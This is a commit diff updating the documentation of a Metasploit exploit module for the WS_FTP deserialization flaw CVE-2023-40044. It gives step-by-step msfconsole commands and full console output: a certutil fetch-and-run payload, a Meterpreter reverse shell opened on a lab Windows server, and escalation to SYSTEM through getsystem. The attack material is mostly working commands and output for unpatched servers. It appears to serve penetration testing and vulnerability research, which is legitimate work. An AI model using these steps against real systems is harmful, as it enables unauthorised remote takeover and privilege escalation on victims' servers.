When I removed the PowerShell target I forgot to update the documenta…

…tion, this commit updates the documentation to reflect the changes made to the exploit module.
rapid7 · Oct 4, 2023 · 623b589 · 623b589
1 parent 75225d0
commit 623b589
Showing 1 changed file with 35 additions and 78 deletions.
diff --git a/documentation/modules/exploit/windows/http/ws_ftp_rce_cve_2023_40044.md b/documentation/modules/exploit/windows/http/ws_ftp_rce_cve_2023_40044.md
@@ -18,37 +18,32 @@ Note: Disable Defender if you are using the default payloads.
 Steps:
 1. Start msfconsole
 2. `use exploit/windows/http/ws_ftp_rce_cve_2023_40044`
-3. `set RHOST <TARGET_IP>`
-4. Set a Target:
-    * `set target 0` for Windows Command.
-    * `set target 1` for Windows Powershell.
-5. Set a suitable PAYLOAD for the chosen target:
-    * `set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp` for Windows Command target.
-    * `set PAYLOAD x64/meterpreter/reverse_tcp` for Windows Powershell target.
-6. `check`
-7. `exploit`
+3. `set LHOST eth0`
+4. `set RHOST <TARGET_IP>`
+5. `check`
+6. `exploit`
 
 ## Scenarios
 
-### Windows Command
+### Windows
 ```
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set RHOST 192.168.86.50
-RHOST => 192.168.86.50
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set target 0
-target => 0
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
-PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set RHOST 192.168.86.47
+RHOST => 192.168.86.47
 msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > show options
 
 Module options (exploit/windows/http/ws_ftp_rce_cve_2023_40044):
 
    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS      192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RHOSTS      192.168.86.47    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                          cs/using-metasploit.html
    RPORT       443              yes       The target port (TCP)
    SSL         true             no        Negotiate SSL/TLS for outgoing connections
-   TARGET_URI  /AHT/            no        Target URI. Must begin with /AHT/
+   TARGET_URI  /AHT/            no        Target URI used to exploit the deserialization vulnerability. Must begin with
+                                          /AHT/
    VHOST                        no        HTTP server virtual host
 
 
@@ -59,89 +54,51 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
    EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
    FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      NrkcXGOM         no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_FILENAME      BkxJVzFxHwL      no        Name to use on remote system when storing payload; cannot contain spac
+                                                  es.
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
    FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
+   LHOST               eth0             yes       The listen address (an interface may be specified)
    LPORT               4444             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Windows Command
+   0   Windows
 
 
 
 View the full module info with the info, or info -d command.
 
 msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > check
-[*] 192.168.86.50:443 - The target appears to be vulnerable. Detected a build date of 28-2-2023
+[*] 192.168.86.47:443 - The target appears to be vulnerable. Detected a build date of 27-8-2021
 msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > exploit
 
 [*] Started reverse TCP handler on 192.168.86.42:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Detected a build date of 28-2-2023
-[*] Sending stage (200774 bytes) to 192.168.86.50
-[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49754) at 2023-10-02 11:32:33 +0100
-
+[+] The target appears to be vulnerable. Detected a build date of 27-8-2021
+[*] Sending stage (200774 bytes) to 192.168.86.47
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.47:61513) at 2023-10-04 17:00:10 +0100
+
+meterpreter > sysinfo
+Computer        : WIN-9SIICLTVVC7
+OS              : Windows 2016+ (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Windows\SysWOW64\inetsrv
 meterpreter > getuid
 Server username: NT AUTHORITY\NETWORK SERVICE
-meterpreter >
-```
-
-### Windows Powershell
-
-```
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set target 1
-target => 1
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
-PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > show options
-
-Module options (exploit/windows/http/ws_ftp_rce_cve_2023_40044):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS      192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT       443              yes       The target port (TCP)
-   SSL         true             no        Negotiate SSL/TLS for outgoing connections
-   TARGET_URI  /AHT/            no        Target URI. Must begin with /AHT/
-   VHOST                        no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter/reverse_tcp):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     192.168.86.42    yes       The listen address (an interface may be specified)
-   LPORT     4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Windows Powershell
-
-
-
-View the full module info with the info, or info -d command.
-
-msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Detected a build date of 28-2-2023
-[*] Sending stage (200774 bytes) to 192.168.86.50
-[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:49755) at 2023-10-02 11:34:01 +0100
-
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
 meterpreter > getuid
-Server username: NT AUTHORITY\NETWORK SERVICE
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > 
 ```